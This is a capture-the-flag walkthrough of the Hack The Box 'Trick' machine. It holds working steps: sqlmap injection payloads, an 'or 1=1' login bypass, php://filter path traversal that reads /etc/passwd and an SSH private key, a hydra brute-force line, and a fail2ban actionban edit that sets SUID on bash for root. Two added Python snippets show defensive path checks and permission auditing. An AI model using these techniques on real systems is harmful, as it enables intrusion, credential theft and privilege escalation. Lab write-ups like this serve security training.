1. IP Address
# Machine Address
10.10.11.166
# Local Address
10.10.14.29
2. Nmap
nmap -sV -sC -oA nmap/trick 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 23:30 EDT
Nmap scan report for 10.10.11.166
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.76 seconds
3. Feroxbuster & ffuf & dig
feroxbuster -u http://10.10.11.166 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.166
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 7l 12w 185c http://10.10.11.166/js
301 7l 12w 185c http://10.10.11.166/css
301 7l 12w 185c http://10.10.11.166/assets
301 7l 12w 185c http://10.10.11.166/assets/img
[####################] - 2m 149995/149995 0s found:4 errors:8
[####################] - 2m 29999/29999 193/s http://10.10.11.166
[####################] - 2m 29999/29999 194/s http://10.10.11.166/js
[####################] - 2m 29999/29999 193/s http://10.10.11.166/css
[####################] - 2m 29999/29999 193/s http://10.10.11.166/assets
[####################] - 2m 29999/29999 193/s http://10.10.11.166/assets/img
Add trick.htb to /etc/hosts
Check for subdomains: ffuf
ffuf -c -u http://trick.htb/ -H "Host: FUZZ.trick.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 5480
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.11.166/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.10.10.11.166
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 5480
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 173 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
dig
dig axfr trick.htb @10.10.11.166
; <<>> DiG 9.16.22-Debian <<>> axfr trick.htb @10.10.11.166
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 228 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Sun Jul 17 00:22:31 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)
preprod-payroll.trick.htb
- subdomain
4. SQL Injection
4.1 SQL Injection
POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://preprod-payroll.trick.htb
DNT: 1
Connection: close
Referer: http://preprod-payroll.trick.htb/login.php
Cookie: PHPSESSID=i20dsqchbqo41pnnt04etht7bo
username=admin&password=admin
sqlmap -r login.req --level 5 --risk 3 --threads 10
The following was done without being logged in.
sqlmap identified the following injection point(s) with a total of 733 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin' OR NOT 9977=9977-- iBdY&password=admin
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' OR (SELECT 8386 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(8386=8386,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tdzQ&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1569 FROM (SELECT(SLEEP(5)))MHct)-- pTTW&password=admin
---
[00:47:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[00:47:02] [INFO] fetched data logged to text files under '/home/va4mi/.local/share/sqlmap/output/preprod-payroll.trick.htb'
[00:47:02] [WARNING] your sqlmap version is outdated
[*] ending @ 00:47:02 /2022-07-17/
Logged in with this:
'or 1=1 -- -
# username: 'or 1=1 -- -
# password: admin
Creds obtained after logging in: Administrator - Enemigosss
4.2 PHP Filter
http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=index
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash
http://preprod-payroll.trick.htb/manage_employee.php?id=1%20union%20select%201,2,load_file(%27/etc/nginx/sites-available/default%27),4,5,6,7,8
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    server_name trick.htb;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name preprod-marketing.trick.htb;
    root /var/www/market;
    index index.php;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name preprod-payroll.trick.htb;
    root /var/www/payroll;
    index index.php;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}
preprod-marketing.trick.htb
- subdomain
4.3 LFI
http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//etc/passwd
etc/passwd
id_rsa
http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZ**********************
-----END OPENSSH PRIVATE KEY-----
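The ....// sequences in the two URLs above only work against a filter that removes ../ a single time. As an added example (not the application's code), the assumed strip-once filter is shown next to a resolve-then-check version; the web root comes from the nginx config above and the payload from the URL:

```python
import posixpath

# Web root of preprod-marketing.trick.htb, taken from the nginx config on the page.
WEB_ROOT = "/var/www/market"
# The page= value used above, without the php://filter wrapper.
PAYLOAD = "....//" * 9 + "etc/passwd"


def naive_sanitize(page):
    """Assumed filter (a reconstruction, not the real application code):
    delete '../' once. Each '....//' loses its inner '../' and becomes '../'."""
    return page.replace("../", "")


def vulnerable_target(page):
    """Sanitize, then join under the web root: the pattern the payload defeats."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, naive_sanitize(page)))


def hardened_resolve(page, web_root=WEB_ROOT):
    """Refuse stream wrappers, absolute paths and NUL bytes, resolve WITHOUT
    stripping anything, then require the result to stay under web_root.
    Returns None on rejection. A real application should use os.path.realpath
    as well so that symlinks cannot escape the root either."""
    if "://" in page or page.startswith("/") or "\x00" in page:
        return None
    candidate = posixpath.normpath(posixpath.join(web_root, page))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None
    return candidate  # '....//' collapses to a harmless filename inside the root


if __name__ == "__main__":
    print("strip-once filter yields :", naive_sanitize(PAYLOAD))    # ../ x9 + etc/passwd
    print("vulnerable include opens :", vulnerable_target(PAYLOAD))  # /etc/passwd
    print("hardened resolve returns :", hardened_resolve(PAYLOAD))
    print("plain ../ traversal      :", hardened_resolve("../../etc/passwd"))  # None
```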
ssh login
ssh -i id_rsa michael@trick.htb
user.txt
8273f35**********
5. Privilege escalation
groups
michael security
sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
fail2ban
fail2ban/ firefox-esr/ fonts/ foomatic/ fstab fuse.conf fwupd/
michael@trick:~$ ls -lh /etc/fail2ban/
total 60K
drwxrwx--- 2 root security 4.0K Jul 26 15:39 action.d
-rw-r--r-- 1 root root 2.3K Jul 26 15:39 fail2ban.conf
drwxr-xr-x 2 root root 4.0K Jul 26 15:39 fail2ban.d
drwxr-xr-x 3 root root 4.0K Jul 26 15:39 filter.d
-rw-r--r-- 1 root root 23K Jul 26 15:39 jail.conf
drwxr-xr-x 2 root root 4.0K Jul 26 15:39 jail.d
-rw-r--r-- 1 root root 645 Jul 26 15:39 paths-arch.conf
-rw-r--r-- 1 root root 2.8K Jul 26 15:39 paths-common.conf
-rw-r--r-- 1 root root 573 Jul 26 15:39 paths-debian.conf
-rw-r--r-- 1 root root 738 Jul 26 15:39 paths-opensuse.conf
drwxrwx--- 2 root security 4.0K Jul 26 15:39 action.d
Copy iptables-multiport.conf to /tmp and modify it
cp /etc/fail2ban/action.d/iptables-multiport.conf /tmp/
cd /tmp
vi iptables-multiport.conf
# change actionban
# actionban = chmod +s /bin/bash
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
cp iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
hydra
# local vm
hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.166
# machine vm
michael@trick:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
/bin/bash -p
bash-5.0# whoami
root
root.txt
4dba7ffb*****
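The root cause of the fail2ban chain is a root-run service whose action.d directory is writable by the group that may also restart it. As an added audit example (not from the page), a small Python check walks a config tree and flags every entry writable by group or other, run here against a temporary copy of the /etc/fail2ban layout from the ls output above:

```python
import os
import shutil
import stat
import tempfile

# /etc/fail2ban/action.d is drwxrwx--- root:security, and michael (group
# "security") may run "/etc/init.d/fail2ban restart" as root, so whatever the
# group writes into action.d is executed by root on the next ban. Any file or
# directory under a root-run service's config tree that a non-owner can write
# is therefore a finding. (Added audit example, not code from the page.)
WRITE_BY_NON_OWNER = stat.S_IWGRP | stat.S_IWOTH


def audit_tree(root):
    """Return paths (relative to root) that group or world may write."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.lstat(full).st_mode & WRITE_BY_NON_OWNER:
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def audit_demo():
    """Rebuild the layout from the page's 'ls -lh /etc/fail2ban/' in a temp dir
    (constructed data: modes copied from the listing, empty contents) and audit it."""
    base = tempfile.mkdtemp(prefix="fail2ban-audit-")
    try:
        dirs = {
            "action.d": 0o770,   # drwxrwx--- root security  <- the finding
            "fail2ban.d": 0o755,
            "filter.d": 0o755,
            "jail.d": 0o755,
        }
        for name, mode in dirs.items():
            os.mkdir(os.path.join(base, name))
            os.chmod(os.path.join(base, name), mode)
        for name in ("fail2ban.conf", "jail.conf", "paths-debian.conf",
                     os.path.join("action.d", "iptables-multiport.conf")):
            path = os.path.join(base, name)
            open(path, "w").close()
            os.chmod(path, 0o644)   # -rw-r--r-- root root in the listing
        return audit_tree(base)
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for hit in audit_demo():
        print("writable by group/other:", hit)   # action.d
```

The same walk should be run over any config tree consumed by a service that a sudo rule lets non-root users restart.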